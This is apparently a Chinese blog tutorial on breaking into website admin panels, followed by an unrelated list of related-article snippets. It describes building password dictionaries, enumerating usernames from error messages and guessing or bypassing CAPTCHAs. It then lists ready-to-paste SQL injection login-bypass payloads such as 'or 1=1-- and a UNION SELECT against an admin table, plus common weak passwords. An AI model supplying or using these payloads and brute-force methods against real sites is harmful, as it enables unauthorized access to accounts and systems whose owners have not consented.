网站后台万能密码/10大常用弱口令
方法 / 步骤
一: 手动探测
先手动猜测几个可能的弱口令,主要是判断站点有没有做登录失败次数限制,若没有限制,则可以使用工具字典工具进行测试
二: 使用字典测试
2.1 字典生成思路
国内很多安全测试团队,常用的弱口令检测方案一般有由以下依据组成
姓名的全拼+数字 / 姓名首字母+数字 / 姓全拼+名的首字母+数字;
键盘分布或 Shift+键盘布局;
好记的数字/ 字母组合: 比如工号,特殊节日、纪念日、年月;
特殊含义的单词、好记的特殊字符组合、特殊含义的字母用数字替换等。
国内常用名TOP 常见组合;
2.2 字典使用策略
收集相关信息,使用社工字典生成等针对该服务工具,可对用户名和密码同时测试,也可以通过用户名登录失败返回的信息判断这个账号在系统中是否存在,如果存在则可以进一步进行对该账号的密码检测。
但现在很多服务为了防止系统遭受暴力请求/DDOS攻击 / 识别用户身份等 会使用验证码机制。通常在网站的 登录/密码找回/用户注册 使用验证码,但当这些验证码具有一定的规律性并且没有做好对应的防护措施时会导致攻击者通过爆破等方式猜解/绕过验证码机制,可导致任意用户注册、批量注册无用账户、重置任意用户密码、获取系统权限等危害。
常见的验证码主要有图片验证码,邮件/短信验证码, 滑动/语音验证码。
2.3 弱口令常用文本
'xor
'or''='
'or'='or'
"or "a"="a
')or('a'='a
'or'a'='a
"or"="a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1
"or 1=1
2.4 DB注入常用检测若口令:
- 用户名
通常是替换表名admin(将下面整个复制粘贴到用户名输入框)
' UNION Select 1,1,1 FROM admin Where ''='
- 密码: 1
2.5 PHP万能密码/弱口令:
'or 1=1/*
2.6 JSP站点常用/万能密码/弱口令:
1'or'1'='1
12345
123456
1234567
12345678
123456789
Password
P@ssw0rd
abc123网站后台万能密码/10大常用弱口令相关推荐
- 想要挑战高薪,不懂算法怎么能行??10 大常用机器学习算法
点击上方"java大数据修炼之道",选择"设为星标" 优质文章和精品资源, 第一时间送达 来源:机器之心 作者:garvitanand2 参与:Geek ...
- java 密码安全策略,杜绝弱口令
/*** @description: 密码安全策略,杜绝弱口令*/ public class PwdCheckUtil {// 斜向连续键盘数字public static String[] KEYBO ...
- 【Python基础】盘点 Python 10 大常用数据结构(下篇)
我的施工之路 虽然艰辛,却有读者们陪伴 Python 常用数据结构 此专题<盘点Python10大常用数据结构>目录: 学习目的 学习目标 1 list 2 tuple 3 set 4 d ...
- 10 大常用软件架构模式简介
编译:伯乐在线/HuihuangZhang http://blog.jobbole.com/114685/ 大型的企业级系统是如何设计的呢?想必大家都曾经有过这样的疑惑.大型软件开发前,我们必须选择一 ...
- 详解Javascript的10大常用设计模式
文章来源 | https://www.cnblogs.com/tugenhua0707/p/5198407.html 一.理解工厂模式 工厂模式类似于现实生活中的工厂可以产生大量相似的商品,去做同样的 ...
- 1元解锁 | Python万能代码模板 |10大必学实用技巧
内容摘要 你要悄悄学 Python,然后惊艳所有人. 一听到 Python 或编程语言,你可能条件反射会觉得"很难".但今天的 Python 课程是个例外,不需要你懂计算机原理,也 ...
- 老网站后台管理密码找出
老板突然让把老网站加个产品,我用FTP下载后,发现后台管理是慧谷动力的,于是找了下管理目录是ssadmin,里面默认页是index.html,打开后,表单指向adminpass.asp,是它验证在用户 ...
- 【Python基础】盘点 Python 10 大常用数据结构(上篇)
我的施工之路 上图施工计划,已完成专题: 1我的施工计划 2数字专题 3字符串专题 4列表专题 5流程控制专题 6编程风格专题 7函数使用 8.面向对象编程(上篇) 9.面向对象编程(下篇) Pyth ...
- python有必要看数据结构_盘点 Python 10 大常用数据结构(上篇)
我的施工计划,已完成专题: Python 常用数据结构 学习目的 这个专题,尽量使用最精简的文字,借助典型案例盘点Python常用的数据结构. 如果你还处于Python入门阶段,通常只需掌握list. ...
最新文章
- oschina android版源码中的颜色值
- QT,C++多项式计算器—version3(厌倦CMD黑框框的走起!)
- C++Builder中开发Activex
- 计算机的硬件工作原理(图片部分资源摘自王道考研资料)
- Ponemon:优化SIEM时所面临的挑战
- 【转】 Pro Android学习笔记(八一):服务(6):复杂数据Parcel
- Python学习Day14
- 2021年Java爬虫技术教程(一小时实现)
- 如果机械工程师分等级的话,你在哪个等级,我是婴儿级
- 亚马逊平板刷机Linux系统,亚马逊平板刷机步骤盘点【图解】
- OCR 识别翻译图片中的文字:iText for Mac
- Android Camera HAL3 - 开篇词
- OpenStack与Tungsten Fabric如何集成丨TF成立大会演讲实录
- 软文营销成功案例-华为用猫设置手机解锁密码
- D盘需要管理员权限解决办法
- EPICS简单的设备支持程序
- mybatis 绑定失败:Invalid bound statement (not found): com.demo.service.api.dao.SysUserMapper.insert
- 计算机毕业设计Java学校食堂管理(源码+系统+mysql数据库+lw文档)
- JAVA毕业设计基层党支部建设平台计算机源码+lw文档+系统+调试部署+数据库
- TCP连接异常终止(RST包)